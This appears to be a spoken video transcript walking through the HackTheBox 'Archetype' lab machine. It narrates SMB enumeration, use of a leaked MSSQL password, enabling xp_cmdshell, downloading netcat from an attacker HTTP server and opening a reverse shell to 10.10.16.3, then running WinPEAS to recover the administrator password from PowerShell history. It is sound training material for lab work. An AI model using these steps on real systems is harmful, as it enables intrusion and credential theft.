What is good, my dudes? I hope everything is good with you and everything good with me. So, I am back. It's been a while. It's been a while for me, but not a while for you. I've had a big old backlog of videos that I needed to edit, and I've been uploading them ever since. But we have reached the end of the backlog, and it is time for me to record again. We are starting off with Archetype, which is the first tier 2 starting point machine on HackTheBox. And I've had to record this video a few times because of things crashing, things going wrong, and so we are just going to get straight on with it. I'm in my box folder, box is spawned, everything's ready to go. I can ping the box just fine, it works, and so we will begin. Question number 1. Which TCP port is hosting a database server? Easy, we know how to do this. We just got to do nmap and then the IP address. Simple enough. The ports we have are RPC, NetBIOS, SMB, and MySQL Server, or MSSQL Server, sorry. I'm going to make that mistake lots of times in this video, so just know that when I'm saying MySQL Server, I actually mean MSSQL Server, but it's a bit more of a mouthful. MSSQL Server's default port is actually 1433, so unless the system admin has tried to be clever, then it is going to be on that port, and that is your answer to your first question. Question number 2, what is the name of the non-administrative share available over SMB? Let's go find out. So in order to do that, we do SMB client -L / the IP address of our box. And we see that we have 4 shares open. We have admin, backups, C, and IPC. Admin, C, and IPC are all default shares of an SMB server, so backups is the one you want for this question. Question number 3, what is the password identified in the file on the SMB share? Let's go find out. So to do that, we actually need to go and connect to the SMB share. We do that using SMB client, just as we have in the past. So we type SMB client / IP address / backups, only 2 slashes on that second one. And then we do ls, and we see that we have prod.dtsconfig. We can get this file, and then we can quit the SMB client, and then we can cat prod.dtsconfig. And we'll see that we have a password, which is megacorp, and that is the answer to your question, megacorp123. We'll see we also have this user right here. This is the SQL service account for the Archetype domain. Don't think we've encountered domains yet, but this doesn't really matter just now. We will get into domains and Active Directory when we start doing the Crest CRT path on HackTheBox after we finish tier 2 of starting point. Anyway, answers megacorp. Let's go on to question number 4. Question number 4. What script from the in-packet collection can be used in order to establish an authenticated connection to an MSSQL server? You can Google this. It will be nice and easy. Just search in-packet MSSQL client or something like that. That kind of gives you the hint right there, but it is mssqlclient.py. Your first reaction would probably be to type this and try and run it, but for some reason it didn't come in my path. So what you got to do instead is try and find it on your Kali box, and to do that you can run this command: find /iname mssqlclient.py and send to, which is the standard error, to /dev/null, which is like the bin on Kali. Once you run that, you will see that it actually lives in your user share folder, and that is where your in-packet scripts are. Now, question number 5. What extended stored procedure of Microsoft SQL Server can be used in order to spawn a Windows command shell? That is XP_CMD shell. Now let me show you what that is. XP_CMD shell. I've got one right here. The XP_CMD shell spawns a Windows command shell and passes in a string for execution. Any output is returned as rows of text. If you were to do XP_CMD shell and then who am I, for example, it would be like, you are this user. So it's the same as just running CMD commands, but from the SQL Server itself. Question number 6. What scripts can be used in order to search possible paths to escalate privileges on Windows hosts? This one is going to be quite important in your pen testing career, and also with CTFs especially. This is WINPEAS, and WINPEAS stands for Windows Privilege Escalation Awesome Script. Very cool name, I approve. And all it does is run different enumeration commands on the Windows host in order to find possible paths to get yourself to system or admin or whatever is elevated. There is also the Linux equivalent, which is LinPeas, and it does much of the same thing. So the answer there is WINPEAS. Question number 7. What file contains the administrator's password? For this, we are going to have to connect to the box, we're going to have to get a reverse shell, and we're going to have to run WINPEAS. This is the hard part of this box, and this will be the longest section of the video. So, first thing we got to do is we got to do Python 3, and then we're going to user share all of that to get to our MSSQL client. Then we're going to specify the username, and then we're going to do @ the IP address, and we're going to use -windows-auth because that is going to prompt us for the password, which we have right here. Now, we are connected via MS SQL right now. What we're concerned about is XP_CMD shell. And say you want to do XP_CMD shell, who am I? So you want to see what user is this running as. You try it. Oh yeah, I've already done this video a few times, so this already works for me. If you're doing this the first time around, you're going to get some kind of error that says XP_CMD shell doesn't work. You need to do SP_configure. Fear not. SP_configure XP_CMD shell. First result is the Microsoft Docs, and that will give you a list of MS SQL commands to run XP_CMD shell working. So you want to select this one, enter it into here, select the next one, and so on until you get all the way through these. Make sure you select reconfigure after selecting these commands right here. XP_CMD shell will work. So then we can do XP_CMD shell, who am I? And you will see that we are running as Archetype. How do we turn this into a shell? If I had the ability to execute commands on a Windows host, I'd probably use netcat, because netcat comes installed. Oh, sorry, I don't know if I said Windows there, but on a Linux host, I would just use netcat. And I would use netcat because it comes pre-installed on Linux, so you can just get a reverse shell just like that, very easy. Windows does not come with netcat. I'm sure there is some kind of tool that comes pre-installed on Windows and does the same thing. However, I am not aware of it. So what we're going to do instead is we're going to download netcat to the box, run netcat, and from there we will be able to get a reverse shell. So the first thing we need to do is get netcat for Windows. Netcat for Windows. And you will see here this GitHub repo. This is the one you want. It's by Intoxexy. Intoxexy. And you'll see in here you have a bunch of different files. You can compile it yourself if you want to, but I just download it. nc64.exe is the one we want. Click download on that, it downloads. We're still in our box folder, so what I'm going to do is I'm going to mv /downloads/nc64.exe to our current folder, and then we can see we have nc64.exe. Then I'm going to start a Python 3 server on port 1212 using python3-m http.server 1212. Hopefully this isn't too fast. I know I am talking very quickly, it's because I've recorded this so many times, but you get the idea. So now what we can do is we can do XP_CMD shell, PowerShell -c, and then we can cd to c/users/SQL_svc downloads, because we can write there. Then after that, we want to do wget -use basic parsing, because otherwise it's going to complain that Internet Explorer hasn't been run for the first time, so just use basic parsing. And then you want to do http://10.10.16.3 is my IP address, 1212/nc64.exe, and then you want your out file to be nc64.exe. If I've typed everything correctly, it should just run and we should get a download, and we have. That means we now have netcat on our machine, on our SQL server rather. So what we can do now is we can go to rev shells. We can go to rev shells. I visit often. Yes, I do visit often. And from there, we can do nc.exe. Now that is not what we want, because we want to interact with cmd.exe. So let me just see if there is a better one. cmd. Now we have this. What we want to do is we want to cancel that and we want to start our listener. So we're now listening on port 6969 for our reverse shell connection. And so what we're going to do now is XP_CMD shell, PowerShell -c, cd, back to that c/users/downloads folder. And now that we're in this, we can use nc64.exe, and then you type in your command as you would 16.3 and 6969 cmd.exe. And once we run this command, we should get a reverse shell. And as you can see, we have a reverse shell on netcat. Nice and easy, works first try, that's what we like to hear. So now, what we can do is we can drop into a PowerShell shell. And now here's where things get a bit weird. So if you haven't installed Pimp My Kali, which if you haven't, definitely install it. I show you how to do it in the first video in this series. There's a section in the video, it's all sectioned off nicely so you can just find it in the YouTube player. But there's a section that teaches you how to install Pimp My Kali. It's very simple. But then you'll have WINPEAS installed on your Kali, so you don't need to go and download it from somewhere. And it installs in cd/opt/WINPEAS, or it installs in opt WINPEAS, I just had to cd there. And then we're going to start another Python server, would you believe? And that means that we can now access WINPEAS from our box, or from our SQL Server. So now we can do wget use basic parsing http://10.10.16.3 1212/winpeas.any.exe, and we want to set our out file as winpeas.any.exe. Might take a second to download, but once it's downloaded, we should be all good to go. Yep, okay, so now we have winpeas.any. And that means we can run winpeas.any. Actually, let me just type it out fully. winpeas.any.exe. And we'll see that we now have WinPeas running. And that will hopefully find the text file. Ooh, that's a lot of output. And this is hopefully going to find that text file that's mentioned in question 7. We're going to have a lot to scroll through though, so bear with me as I try and find it. After having a check through a lot of the output from the WinPeas command, or from the WinPeas script rather, we can see that we have a PS history file that actually has some information in it. And that's in users, SQL Service, roaming, Microsoft, PowerShell, blah, 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 blah. But you can see that this might be quite an interesting file because it's console host history. Very interesting. It's going to have previous commands that have been run before we were here. That could be quite juicy. Sorry, answering question 7 was console host _ history.text. That is the answer to question number 7. So now we can see that in the past, we did a net.exe use command, and we said we want to run as the administrator, and the password is megacorp admin. Interesting. So that is now our admin password. We know that we have admin credentials now. Now what we can do is we can actually SMB client to the box as an admin user. So what we can do is specify that we want to be administrator. And then once you put in your megacorp admin password, you should be able to connect as the admin, and now you're in as the admin. So you can go to users and you can ls. You can see that you have administrator. You can go to their desktop, td desktop, case sensitive, and you can grab root.txt. Or you can get root.txt. And now let's go find the user flag. So /cd./ls cd sql svc. Hopefully it's in here. Go to desktop and we have user.txt. Get user.txt. Then we can quit and we can see that we have both root and user.txt. And just like that, we have finished the first tier 2 starting point machine on HackTheBox. I hope this made sense. I hope you learned something today, and I will see you in the next one.